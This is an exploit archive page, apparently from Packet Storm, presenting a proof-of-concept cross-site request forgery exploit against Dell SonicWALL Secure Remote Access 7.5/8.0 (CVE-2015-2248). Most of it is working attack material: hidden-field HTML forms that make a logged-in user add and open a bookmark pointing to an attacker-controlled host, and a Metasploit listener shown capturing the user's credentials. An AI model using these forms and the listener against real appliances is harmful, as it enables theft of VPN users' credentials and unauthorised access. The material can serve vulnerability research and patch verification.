what you don't know can hurt you

Dell SonicWALL Secure Remote Access 7.5 / 8.0 CSRF

Dell SonicWALL Secure Remote Access 7.5 / 8.0 CSRF
Posted May 5, 2015
Authored by Veit Hailperin

Dell SonicWALL Secure Remote Access (SRA) versions 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv proof of concept cross site request forgery exploit.

tags | exploit, remote, proof of concept, csrf
advisories | CVE-2015-2248
MD5 | 8354c1619d71c02b3f5273b088bb67da

Dell SonicWALL Secure Remote Access 7.5 / 8.0 CSRF

Change Mirror Download
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248

Exploitation Procedure (Outline):
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
3. Gather the credentials on the target server provided in step #1

1. Create a bookmark:

<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
<input type="hidden" name="bmName" value="foo" />
<input type="hidden" name="host" value="www.malicious-host.tld" />
<input type="hidden" name="description" value="bar" />
<input type="hidden" name="tabs" value="Baz" />
<input type="hidden" name="service" value="HTTP" />
<input type="hidden" name="fbaSSOEnabled" value="on" />
<input type="hidden" name="fbaSSOFormUserName" value="user" />
<input type="hidden" name="fbaSSOFormUserPassword" value="password" />
<input type="hidden" name="MC_App" value="inherit" />
<input type="hidden" name="MC_Copy" value="inherit" />
<input type="hidden" name="MC_Print" value="inherit" />
<input type="hidden" name="MC_Offline" value="inherit" />
<input type="hidden" name="name" value="name" />
<input type="hidden" name="type" value="type" />
<input type="hidden" name="owner" value="owner" />
<input type="hidden" name="cmd" value="add" />
<input type="hidden" name="wantBmData" value="true" />
<input type="hidden" name="ok" value="OK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

2. Call the newly created bookmark
This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.

<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
<input type="hidden" name="HOST" value="www.malicious-host.tld" />
<input type="hidden" name="bookmarkAccessed" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

3. Set up a listener
E.g. metasploit payload
use auxiliary/server/capture/http_basic

msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    15 Files
  • 10
    Dec 10th
    30 Files
  • 11
    Dec 11th
    8 Files
  • 12
    Dec 12th
    20 Files
  • 13
    Dec 13th
    6 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close